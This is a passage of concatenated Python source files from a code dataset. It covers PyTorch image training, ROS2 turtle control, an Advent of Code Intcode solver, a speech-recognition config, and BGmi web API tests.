])\n\n testing_transforms = T.Compose([\n T.Scale(299),\n T.CenterCrop(299),\n T.ToTensor(),\n normalize,\n ])\n\n training_ds = datasets.ImageFolder(image_folder, testing_transforms)\n testing_ds = datasets.ImageFolder(image_folder, testing_transforms)\n\n # indices randomly selected from all instances in dataset to be used\n # for either training or testing\n train_indices, test_indices = train_test_split(training_ds, shuffle=True)\n\n train_sampler = SubsetRandomSampler(train_indices)\n test_sampler = SubsetRandomSampler(test_indices)\n\n # Both dataloader loads from the same dataset but with different indices\n train_loader = DataLoader(training_ds,\n batch_size=20,\n sampler=train_sampler,\n num_workers=4,\n pin_memory=True)\n\n test_loader = DataLoader(testing_ds,\n batch_size=1,\n sampler=test_sampler,\n num_workers=1,\n pin_memory=True)\n\n return train_loader, test_loader\n\ndef main():\n # model = M.vgg19(pretrained=True)\n # model = M.inception_v3(pretrained=True,aux_logits=False)\n\n # fuck this aux_logit bullshit; redefined inception.py to ignore this\n # transform_input identical to normalize Transform, which we already do\n model = inception.inception_v3(pretrained=True,transform_input=False)\n for param in model.parameters():\n # freeze all the layers\n param.requires_grad = False\n # Replace the last fully-connected layer\n # Parameters of newly constructed modules have requires_grad=True by default\n model.fc = nn.Linear(2048, 2) # assuming that the fc7 layer has 2048 neurons, otherwise change it\n #model.classifier._modules['6'] = nn.Linear(4096,2)\n\n # hack to get Inception_v3 to work (if aux_logits=True)\n #model.AuxLogits = M.inception.InceptionAux(768,2)\n\n if USE_CUDA:\n model = model.cuda()\n\n train_loader, test_loader = load_data(image_folder)\n\n # define loss function (criterion) and optimizer\n criterion = nn.CrossEntropyLoss().cuda() if USE_CUDA else nn.CrossEntropyLoss()\n\n optimizer = optim.SGD(model.fc.parameters(), learning_rate,\n momentum=0.9,\n weight_decay=1e-4)\n\n train_start = time.time()\n\n train_accs = []\n test_accs = []\n for epoch in range(nEpochs):\n #adjust_learning_rate(optimizer, epoch)\n\n # train for one epoch\n train_acc = train(train_loader, model, criterion, optimizer, epoch)\n test_acc = test(test_loader, model, criterion, epoch)\n\n train_accs.append(train_acc)\n test_accs.append(test_acc)\n\n train_end = time.time()\n\n print('Total Training/Testing Time: %.3f' % (train_end - train_start))\n\n results = (train_accs, test_accs)\n create_plots(results,'Results')\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n # switch to train mode\n model.train()\n\n end = time.time()\n for i, (input, target) in enumerate(train_loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if USE_CUDA:\n input = input.cuda()\n target = target.cuda()\n\n input_var = var(input)\n target_var = var(target)\n\n #print('okay0')\n # compute output\n output = model(input_var)\n #output = nn.Softmax()(output)\n #print('okay6')\n loss = criterion(output, target_var)\n #print('okay7')\n\n # measure accuracy and record loss\n prec1 = accuracy(output.data, target, topk=(1,))\n losses.update(loss.data[0], input.size(0))\n top1.update(prec1[0], input.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n #print('okay8')\n loss.backward()\n #print('okay9')\n optimizer.step()\n #print('okay10')\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n print('Epoch: [%d]\\n'\n '\\tTraining Set Performance:\\n'\n '\\t\\tTime %.3f (avg: %.3f)\\n'\n '\\t\\tData %.3f (avg: %.3f)\\n'\n '\\t\\tLoss %.3f (avg: %.3f)\\n'\n % (epoch,\n batch_time.val, batch_time.avg,\n data_time.val, data_time.avg,\n losses.val, losses.avg), end='')\n print('\\n\\t\\tAccuracy {} (avg: {})\\t'.format(top1.val[0],top1.avg[0]))\n\n return top1.avg[0]\n\n\ndef test(test_loader, model, criterion, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n #losses = AverageMeter()\n top1 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (input, target) in enumerate(test_loader):\n data_time.update(time.time() - end)\n\n if USE_CUDA:\n input = input.cuda()\n target = target.cuda()\n input_var = torch.autograd.Variable(input, volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n\n # compute output\n output = model(input_var)\n #output = nn.Softmax()(output)\n #loss = criterion(output, target_var)\n\n # measure accuracy and record loss\n prec1 = accuracy(output.data, target, topk=(1,))\n #print(prec1)\n #losses.update(loss.data[0], input.size(0))\n top1.update(prec1[0], input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n '''\n print(' * Prec@1 {top1.avg:.3f}'\n .format(top1=top1))\n '''\n print('\\n\\tTest_Accuracy: {}'.format(top1.avg[0]))\n\n return top1.avg[0]\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n #print(output)\n #print(target)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n #print(correct)\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n\n #print(res)\n return res\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\nif __name__ == '__main__':\n main()\n","sub_path":"final_proj/src/pytorch/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"629707248","text":"from base.base_driver import initdriver\nfrom base.read_data import read_yaml\nfrom page.page import Page\nimport pytest\n\n\nclass TestContact:\n def setup(self):\n self.driver=initdriver()\n self.page=Page(self.driver)\n def teardown(self):\n self.driver.quit()\n @pytest.mark.parametrize(\"args\",read_yaml(\"test_content1\",\"contact_data.yaml\"))\n #def test_contact(self,name,phone):\n @pytest.allure.severity(pytest.allure.severity_level.BLOCKER)\n def test_contact1(self,args):\n print(args)\n print(args[\"name\"])\n self.page.contact().click_contact()\n self.page.add_page().click_keeplocal()\n self.page.setcount().input_name(args[\"name\"])\n self.page.setcount().input_phone(args[\"phone\"])\n\n\n\n # @pytest.mark.parametrize((\"name\", \"phone\"), [(\"wang\", 121), (\"li\", 333)])\n #def test_contact2(self):\n\n\n\n","sub_path":"scripts/test_contact.py","file_name":"test_contact.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"169581302","text":"\"\"\"\r\n historicd.py\r\n This technique is an implementation by Ken Field of the historic technique\r\n\r\n Programmed by Linda Beale, Esri Inc\r\n\r\n Description: Creates historic dots from an input elevation raster\r\n\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport arcpy\r\n\r\n\r\nclass HistoricDots(object):\r\n \"\"\"Historic Dots Tool class\"\"\"\r\n \r\n def __init__(self):\r\n \"\"\"Define the tool (tool name is the name of the class).\"\"\"\r\n self.label = \"Historic Dots\"\r\n self.description = \"\"\r\n self.canRunInBackground = False\r\n\r\n def getParameterInfo(self):\r\n \"\"\"Define parameter definitions\"\"\"\r\n \r\n in_dem = arcpy.Parameter(\r\n name='input_dem',\r\n displayName='Input DEM',\r\n datatype='GPRasterLayer',\r\n direction='Input',\r\n parameterType='Required')\r\n\r\n out_feature_class = arcpy.Parameter(\r\n name='out_feature_class ',\r\n displayName='Output Feature Class',\r\n datatype='DEFeatureClass',\r\n direction='Output',\r\n parameterType='Required')\r\n \r\n # Use __file__ attribute to find the .lyr file\r\n out_feature_class.symbology = \\\r\n os.path.join(os.path.dirname(os.path.dirname(__file__)),\r\n 'LayerFiles', \r\n 'contour_dot.lyr')\r\n \r\n contour_interval = arcpy.Parameter(\r\n name='contour_interval',\r\n displayName='Contour Interval',\r\n datatype='GPLong',\r\n direction='Input',\r\n parameterType='Required') \r\n \r\n base_contour = arcpy.Parameter(\r\n name='base_contour',\r\n displayName='Base Contour',\r\n datatype='GPLong',\r\n direction='Input',\r\n parameterType='Optional') \r\n \r\n base_contour.value = 0 # default\r\n\r\n z_factor = arcpy.Parameter(\r\n name='z_factor',\r\n displayName='Z Factor',\r\n datatype='GPLong',\r\n direction='Input',\r\n parameterType='Optional')\r\n\r\n z_factor.value = 1 # default\r\n\r\n params = [in_dem, out_feature_class, contour_interval, base_contour,\r\n z_factor]\r\n \r\n return params\r\n\r\n def isLicensed(self):\r\n \"\"\"Set whether tool is licensed to execute.\"\"\"\r\n try:\r\n if arcpy.CheckExtension(\"spatial\") != \"Available\":\r\n raise Exception\r\n except Exception:\r\n return False # tool cannot be executed\r\n\r\n return True # tool can be executed\r\n\r\n def updateParameters(self, parameters):\r\n \"\"\"Modify the values and properties of parameters before internal\r\n validation is performed. This method is called whenever a parameter\r\n has been changed.\"\"\"\r\n \r\n return\r\n\r\n def updateMessages(self, parameters):\r\n \"\"\"Modify the messages created by internal validation for each tool\r\n parameter. This method is called after internal validation.\"\"\"\r\n \r\n if parameters[2].value and parameters[2].value <= 0:\r\n parameters[2].setErrorMessage('Contour Interval must be greater than 0') \r\n \r\n if parameters[4].value <= 0:\r\n parameters[4].setErrorMessage('Z Factor must be greater than 0') \r\n \r\n return\r\n\r\n def execute(self, parameters, messages):\r\n \"\"\"The source code of the tool.\"\"\"\r\n\r\n param_values = (p.valueAsText for p in parameters)\r\n\r\n try:\r\n historic_dots(*param_values)\r\n except Exception as err:\r\n arcpy.AddError(err)\r\n sys.exit(1)\r\n\r\n return\r\n\r\n\r\ndef historic_dots(in_DEM, out_fc, contour_width, base_contour, z_factor):\r\n \"\"\"\r\n historic_dots: calculates historic dots\r\n\r\n Required arguments:\r\n Inputs:\r\n in_DEM -- Input DEM.\r\n contour_width -- contour width.\r\n base_contour -- base contour value.\r\n z_factor -- z value.\r\n Outputs:\r\n out_fc -- output Feature Class.\r\n \"\"\"\r\n # Check out the Spatial Analyst license\r\n arcpy.CheckOutExtension(\"Spatial\")\r\n\r\n slope_in_degrees = arcpy.sa.Slope(in_DEM, \"DEGREE\")\r\n out_condition = arcpy.sa.Con(slope_in_degrees > 5, in_DEM)\r\n arcpy.sa.Contour(out_condition, out_fc, contour_width, base_contour,\r\n z_factor)\r\n\r\n return\r\n","sub_path":"demos/2_structure/Scripts/historicd.py","file_name":"historicd.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"580612025","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom helper import *\n\n\ndef process(img, region):\n \"\"\"\n Extract original plate \n :param img: original plate image\n :param region: region information\n \"\"\"\n # extract plate\n x1, y1 = np.uint(region[0])\n x2, y2 = np.uint(region[1])\n plate = img[x1:x2, y1:y2]\n\n # calculate rotation angle\n angle = abs(region[4][0])\n if angle < 45:\n angle = -angle\n else:\n angle = 90 - angle\n # end if\n\n # rotate plate\n cy, cx = region[2]\n cols = y2 - y1\n rows = x2 - x1\n rot_mat = cv2.getRotationMatrix2D((cy, cx), angle, 1)\n out = cv2.warpAffine(plate, rot_mat, (cols, rows))\n\n # resize plate\n row, col = cfg.PLATE_DIM\n out = cv2.resize(out, (col, row))\n\n return out\n# end function\n\n\ndef run(prev, cur, original):\n \"\"\"\n Run stage task\n :param prev: Previous stage number\n :param cur: Current stage number\n :param original: Stage number of plate image\n \"\"\"\n runtime = []\n util.log(\"Stage\", cur, \"Extracting the plate image\")\n for read in util.get_data(prev):\n # region data from the previous stage\n region = util.stage_data(read, prev)\n region = np.loadtxt(region)\n\n # get original image\n name = \".\".join(read.split(\".\")[1:])\n img = util.stage_image(name, original)\n img = cv2.imread(img, cv2.CV_8UC1)\n\n # get result\n plate, time = util.execute_module(process, img, region)\n runtime.append(time)\n\n # save plates to image file\n write = util.stage_image(read, cur)\n cv2.imwrite(write, plate)\n\n # log\n util.log(\"Converted\", read, \"| %.3f s\" % time, stage=cur)\n # end for\n\n return np.average(runtime)\n# end function\n","sub_path":"modules/ExtractPlate.py","file_name":"ExtractPlate.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"129394956","text":"\"\"\"small script to count the lexicon entries by cycle\n\"\"\"\nimport json\n\nwith open(\"lexicon.json\") as f:\n lexicon = json.load(f)\n\nmini = {}\nfor i, cycle in enumerate(lexicon):\n mini[str(i)] = 0 \n for entry in cycle: # each entry corresponds to a pattern\n mini[str(i)] += len(entry[0])\n\nprint(mini)\n\n\n\n\n\n","sub_path":"5_Process/_aroma_NOUN+VERB/lexicon_count.py","file_name":"lexicon_count.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"302222232","text":"# pylint: skip-file\nimport tensorflow as tf\n\nfrom open_seq2seq.data import Speech2TextDataLayer\nfrom open_seq2seq.decoders import FullyConnectedCTCDecoder\nfrom open_seq2seq.encoders import DeepSpeech2Encoder\nfrom open_seq2seq.losses import CTCLoss\nfrom open_seq2seq.models import Speech2Text\nfrom open_seq2seq.optimizers.lr_policies import exp_decay\n\n\nbase_model = Speech2Text\n\nbase_params = {\n \"random_seed\": 0,\n \"use_horovod\": False,\n \"num_epochs\": 12,\n\n \"num_gpus\": 1,\n \"batch_size_per_gpu\": 32,\n\n \"save_summaries_steps\": 100,\n \"print_loss_steps\": 10,\n \"print_samples_steps\": 5000,\n \"eval_steps\": 5000,\n \"save_checkpoint_steps\": 1000,\n \"logdir\": \"experiments/librispeech-quick\",\n\n \"optimizer\": \"Adam\",\n \"optimizer_params\": {},\n \"lr_policy\": exp_decay,\n \"lr_policy_params\": {\n \"learning_rate\": 0.0001,\n \"begin_decay_at\": 0,\n \"decay_steps\": 5000,\n \"decay_rate\": 0.9,\n \"use_staircase_decay\": True,\n \"min_lr\": 0.0,\n },\n \"dtype\": tf.float32,\n # weight decay\n \"regularizer\": tf.contrib.layers.l2_regularizer,\n \"regularizer_params\": {\n 'scale': 0.0005\n },\n \"initializer\": tf.contrib.layers.xavier_initializer,\n\n \"summaries\": ['learning_rate', 'variables', 'gradients', 'larc_summaries',\n 'variable_norm', 'gradient_norm', 'global_gradient_norm'],\n\n \"encoder\": DeepSpeech2Encoder,\n \"encoder_params\": {\n \"conv_layers\": [\n {\n \"kernel_size\": [11, 41], \"stride\": [2, 2],\n \"num_channels\": 32, \"padding\": \"SAME\"\n },\n {\n \"kernel_size\": [11, 21], \"stride\": [1, 2],\n \"num_channels\": 32, \"padding\": \"SAME\"\n }\n ],\n \"num_rnn_layers\": 2,\n \"rnn_cell_dim\": 512,\n\n \"use_cudnn_rnn\": True,\n \"rnn_type\": \"cudnn_gru\",\n \"rnn_unidirectional\": False,\n\n \"row_conv\": False,\n\n \"n_hidden\": 1024,\n\n \"dropout_keep_prob\": 0.5,\n \"activation_fn\": tf.nn.relu,\n \"data_format\": \"channels_first\",\n },\n\n \"decoder\": FullyConnectedCTCDecoder,\n \"decoder_params\": {\n \"use_language_model\": False,\n\n # params for decoding the sequence with language model\n \"beam_width\": 512,\n \"alpha\": 2.0,\n \"beta\": 1.0,\n\n \"decoder_library_path\": \"ctc_decoder_with_lm/libctc_decoder_with_kenlm.so\",\n \"lm_path\": \"language_model/4-gram.binary\",\n \"trie_path\": \"language_model/trie.binary\",\n \"alphabet_config_path\": \"open_seq2seq/test_utils/toy_speech_data/vocab.txt\",\n },\n \"loss\": CTCLoss,\n \"loss_params\": {},\n}\n\ntrain_params = {\n \"data_layer\": Speech2TextDataLayer,\n \"data_layer_params\": {\n \"num_audio_features\": 96,\n \"input_type\": \"spectrogram\",\n \"augmentation\": {\n 'time_stretch_ratio': 0.05,\n 'noise_level_min': -90,\n 'noise_level_max': -60\n },\n \"vocab_file\": \"open_seq2seq/test_utils/toy_speech_data/vocab.txt\",\n \"dataset_files\": [\n \"data/librispeech/librivox-train-clean-100.csv\",\n \"data/librispeech/librivox-train-clean-360.csv\",\n ],\n \"shuffle\": True,\n },\n}\n\neval_params = {\n \"data_layer\": Speech2TextDataLayer,\n \"data_layer_params\": {\n \"num_audio_features\": 96,\n \"input_type\": \"spectrogram\",\n \"vocab_file\": \"open_seq2seq/test_utils/toy_speech_data/vocab.txt\",\n \"dataset_files\": [\n \"data/librispeech/librivox-dev-clean.csv\",\n ],\n \"shuffle\": False,\n },\n}\n","sub_path":"example_configs/speech2text/ds2_small_1gpu.py","file_name":"ds2_small_1gpu.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"551962264","text":"#!/usr/bin/env python3\r\n__author__ = 'dmmjy9'\r\n\r\nimport threading\r\nimport time\r\n\r\ndef addNum():\r\n\tglobal num\r\n\tprint('--get num:',num)\r\n\ttime.sleep(1)\r\n\tlock.acquire()\r\n\tnum -= 1\r\n\tlock.release()\r\n\r\nlock = threading.Lock()\r\nnum = 100\r\nthread_list = []\r\nfor i in range(100):\r\n\tt = threading.Thread(target=addNum)\r\n\tt.start()\r\n\tthread_list.append(t)\r\nfor t in thread_list:\r\n\tt.join()\r\n\r\nprint('final num:',num)","sub_path":"Day8/thread_test/thread_lock.py","file_name":"thread_lock.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"397705952","text":"from gym import spaces\nimport torch\n\n\nclass BitFlipEnvironment:\n def __init__(self, bits):\n self.action_space = spaces.Discrete(bits)\n self.max_steps = bits\n self.observation_space = spaces.MultiBinary(bits)\n self.goal_space = spaces.MultiBinary(bits)\n self.bits = bits\n self.state = torch.zeros((self.bits,))\n self.goal = torch.zeros((self.bits,))\n self.reset()\n\n def reset(self):\n self.state = torch.randint(2, size=(self.bits,), dtype=torch.float)\n self.goal = torch.randint(2, size=(self.bits,), dtype=torch.float)\n if torch.equal(self.state, self.goal):\n self.reset()\n return self.state.clone(), self.goal.clone()\n\n def step(self, action):\n self.state[action] = (\n 1 - self.state[action]\n ) # Flip the bit on position of the action\n reward, done = self.compute_reward(self.state, self.goal)\n return self.state.clone(), reward, done\n\n def render(self):\n print(\"State: {}\".format(self.state.tolist()))\n print(\"Goal : {}\\n\".format(self.goal.tolist()))\n\n @staticmethod\n def compute_reward(state, goal):\n done = torch.equal(state, goal)\n return torch.tensor(0.0 if done else -1.0), done\n","sub_path":"genrl/deep/agents/her/bitflip.py","file_name":"bitflip.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"40298934","text":"#!/usr/bin/env python3\nimport rclpy\nfrom rclpy.node import Node\nimport math\nfrom functools import partial\n\nfrom my_robot_interfaces.msg import Turtle, TurtleArray\nfrom my_robot_interfaces.srv import CatchTurtle\n\nfrom turtlesim.msg import Pose\nfrom geometry_msgs.msg import Twist\n\nclass TurtleControllerNode(Node):\n\n def __init__(self):\n super().__init__(\"turtle_controller\")\n self.declare_parameter(\"catch_closest_turtle_fist\", True)\n self.catch_closest_turtle_fist_ = self.get_parameter(\"catch_closest_turtle_fist\").value\n \n self.pose_ = None\n self.turtle_to_catch_ = None\n\n self.alive_turtles_subscriber_ = self.create_subscription(TurtleArray, \"alive_turtles\", self.callback_alive_turtles, 10)\n self.pose_subscriber_ = self.create_subscription(Pose, \"turtle1/pose\", self.callback_turtle_pose, 10)\n self.cmd_vel_publisher_ = self.create_publisher(Twist, \"turtle1/cmd_vel\", 10)\n self.control_loop_timer_ = self.create_timer(0.01, self.control_loop)\n self.get_logger().info(\"Turtle controller has been started\")\n\n def callback_alive_turtles(self, msg):\n if len(msg.turtles) > 0:\n if self.catch_closest_turtle_fist_:\n closest_turtle = None\n closest_turtle_distance = None\n\n for turtle in msg.turtles:\n dist_x = (turtle.x - self.pose_.x)\n dist_y = (turtle.y - self.pose_.y)\n distance = math.sqrt(dist_x*dist_x + dist_y*dist_y)\n if closest_turtle == None or distance < closest_turtle_distance:\n closest_turtle = turtle\n closest_turtle_distance = distance\n\n self.turtle_to_catch_ = closest_turtle\n else:\n self.turtle_to_catch_ = msg.turtles[0]\n\n def callback_turtle_pose(self, msg):\n self.pose_ = msg\n\n def control_loop(self):\n if self.pose_ == None or self.turtle_to_catch_ == None:\n return\n \n dist_x = (self.turtle_to_catch_.x - self.pose_.x)\n dist_y = (self.turtle_to_catch_.y - self.pose_.y)\n distance = math.sqrt(dist_x*dist_x + dist_y*dist_y)\n\n msg = Twist()\n\n if distance > 0.5:\n diff = math.atan2(dist_y,dist_x) - self.pose_.theta \n if diff > math.pi:\n diff -= 2*math.pi\n elif diff < -math.pi:\n diff += 2*math.pi\n\n msg.linear.x = 2*distance\n msg.angular.z = 6*diff\n else:\n msg.linear.x = 0.0\n msg.angular.z = 0.0\n self.call_catch_turtle_server(self.turtle_to_catch_.name)\n self.turtle_to_catch_ = None\n\n self.cmd_vel_publisher_.publish(msg)\n\n def call_catch_turtle_server(self, turtle_name):\n client = self.create_client(CatchTurtle, \"catch_turtle\")\n while not client.wait_for_service(1.0):\n self.get_logger().warn(\"Waiting for Server...\")\n\n request = CatchTurtle.Request()\n request.name = turtle_name\n\n future = client.call_async(request)\n future.add_done_callback(partial(\n self.callback_call_catch_turtle, turtle_name=turtle_name))\n\n def callback_call_catch_turtle(self, future, turtle_name):\n try:\n response = future.result()\n if not response.success:\n self.get_logger().error(\"Turtle \" + str(turtle_name) + \" could not be caught\")\n except Exception as e:\n self.get_logger().error(\"Service call failed %r\" % (e,))\n\n\ndef main(args=None):\n rclpy.init(args=args) \n node = TurtleControllerNode()\n rclpy.spin(node)\n rclpy.shutdown()\n\nif __name__ == \"__main__\":\n main()","sub_path":"ros2_pkgs/turtle_catch_them_all/turtle_catch_them_all/turtle_controller.py","file_name":"turtle_controller.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"529234015","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom collections import deque, namedtuple\nfrom copy import deepcopy\nfrom intcode import Intcode, Intcode_State\n\n\ndef part1(program: list) -> int:\n visited = set((0, 0))\n Finder = namedtuple('Finder', [ 'coord', 'path', 'steps', 'intcode_state' ])\n finders = deque([ Finder(_next_coord((0, 0), d), [], 0, Intcode_State(program, [ d ])) for d in range(1, 5) ])\n while finders:\n father = finders.popleft()\n out = _move(father.intcode_state)\n if out == 2:\n return father.steps + 1\n if out == 0:\n continue\n for direction in range(1, 5):\n nxt = _next_coord(father.coord, direction)\n if nxt in visited:\n continue\n visited.add(nxt)\n child_state = deepcopy(father.intcode_state)\n child_state.input.append(direction)\n finders.appendleft(Finder(nxt, father.path + [ nxt ], father.steps + 1, child_state))\n return -1\n\n\ndef _move(state: Intcode_State) -> int:\n while not state.exit:\n if state.output:\n return state.output.pop()\n Intcode.run(state)\n return None\n\n\ndef _next_coord(coord: (int, int), mov: int) -> (int, int):\n x, y = coord\n if mov == 1:\n y += 1\n elif mov == 2:\n y -= 1\n elif mov == 3:\n x -= 1\n elif mov == 4:\n x += 1\n return (x, y)\n\n\ndef part2(program: list) -> int:\n w_map = _get_map(program)\n oxy = [ w_map.oxy_location ]\n minutes = 0\n while w_map.coordinates:\n oxy_tmp = []\n while oxy:\n for location in _get_adjacent(oxy.pop()):\n if location in w_map.coordinates:\n w_map.coordinates.remove(location)\n oxy_tmp.append(location)\n oxy = oxy_tmp\n minutes += 1\n return minutes\n\n\ndef _get_adjacent(coord: (int, int)) -> list:\n x, y = coord\n return [ (x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1) ]\n\n\nclass Map:\n def __init__(self):\n self.coordinates = set()\n\n def set_oxy_location(self, oxy_location: (int, int)):\n self.oxy_location = oxy_location\n\n def add_coord(self, coord: (int, int)):\n self.coordinates.add(coord)\n\n\ndef _get_map(program: list) -> Map:\n w_map = Map()\n visited = set((0, 0))\n Finder = namedtuple('Finder', [ 'coord', 'intcode_state' ])\n finders = deque([ Finder(_next_coord((0, 0), d), Intcode_State(program, [ d ])) for d in range(1, 5) ])\n while finders:\n father = finders.popleft()\n out = _move(father.intcode_state)\n if out == 0:\n continue\n if out == 2:\n w_map.set_oxy_location(father.coord)\n else:\n w_map.add_coord(father.coord)\n for direction in range(1, 5):\n nxt = _next_coord(father.coord, direction)\n if nxt in visited:\n continue\n visited.add(nxt)\n child_state = deepcopy(father.intcode_state)\n child_state.input.append(direction)\n finders.appendleft(Finder(nxt, child_state))\n return w_map\n\n\nif __name__ == '__main__':\n with open('input.txt') as f:\n values = list(map(int, f.read().split(',')))\n print(part1(list(values))) # 216\n print(part2(values)) # 326\n","sub_path":"2019/day_15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"41881009","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import print_function, unicode_literals\r\n\r\nimport json\r\nimport logging\r\nimport os\r\nimport random\r\nimport string\r\nimport unittest\r\n\r\nfrom tornado.testing import AsyncHTTPTestCase\r\n\r\nfrom bgmi.front.server import make_app\r\nfrom bgmi.main import unicode_\r\n\r\nlogging.basicConfig(level=logging.DEBUG)\r\n\r\n\r\ndef random_word(length):\r\n letters = string.ascii_lowercase\r\n return ''.join(random.choice(letters) for i in range(length))\r\n\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.ERROR)\r\napi_list = [\r\n {\r\n 'action': 'update',\r\n 'method': 'post',\r\n 'params': '{}',\r\n }, {\r\n 'action': 'status',\r\n 'method': 'post',\r\n 'params': json.dumps({\r\n 'name': os.environ.get('BANGUMI_2'),\r\n 'status': 1,\r\n }),\r\n }\r\n]\r\n\r\n\r\n# DB.recreate_source_relatively_table()\r\n\r\n\r\nclass ApiTestCase(AsyncHTTPTestCase):\r\n # class ApiTestCase(unittest.TestCase)\r\n headers = {'BGmi-Token': '233', 'Content-Type': 'application/json'}\r\n bangumi_1 = unicode_(os.environ.get('BANGUMI_1'))\r\n bangumi_2 = unicode_(os.environ.get('BANGUMI_2'))\r\n bangumi_3 = unicode_(os.environ.get('BANGUMI_3'))\r\n\r\n def get_app(self):\r\n self.app = make_app(debug=False)\r\n return self.app\r\n\r\n def test_a_auth(self):\r\n r = self.fetch('/api/auth', method='POST', body=json.dumps({'token': '233'}))\r\n self.assertEqual(r.code, 200)\r\n res = self.parse_response(r)\r\n self.assertEqual(res['status'], 'success')\r\n\r\n r = self.fetch('/api/auth', method='POST', body=json.dumps({'token': '3'}))\r\n self.assertEqual(r.code, 400)\r\n res = self.parse_response(r)\r\n self.assertEqual(res['status'], 'error')\r\n\r\n def test_a_index(self):\r\n response = self.fetch('/', method='GET')\r\n self.assertEqual(response.code, 404)\r\n\r\n def test_a_cal(self):\r\n r = self.fetch('/api/cal', method='GET')\r\n res = self.parse_response(r)\r\n self.assertIsInstance(res['data'], dict)\r\n\r\n def test_b_add(self):\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_1,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_1,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n\r\n def test_c_delete(self):\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n def test_e_mark(self):\r\n episode = random.randint(0, 10)\r\n self.fetch('/api/mark', method='POST', headers=self.headers,\r\n body=json.dumps({\r\n \"name\": self.bangumi_1,\r\n \"episode\": episode\r\n }))\r\n r = self.fetch('/api/index', method='GET')\r\n self.assertEqual(r.code, 200)\r\n res = self.parse_response(r)\r\n bg_dict = {}\r\n for item in res['data']:\r\n if item['bangumi_name'] == self.bangumi_1:\r\n bg_dict = item\r\n break\r\n self.assertEqual(bg_dict['bangumi_name'], self.bangumi_1)\r\n self.assertEqual(bg_dict['episode'], episode)\r\n\r\n def test_d_filter(self):\r\n include = random_word(5)\r\n exclude = random_word(5)\r\n regex = random_word(5)\r\n\r\n r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n 'name': self.bangumi_1,\r\n }), headers=self.headers)\r\n\r\n self.assertEqual(r.code, 200)\r\n res = self.parse_response(r)\r\n self.assertEqual(res['status'], 'success')\r\n\r\n if len(res['data']['subtitle_group']) >= 2:\r\n subtitle_group = 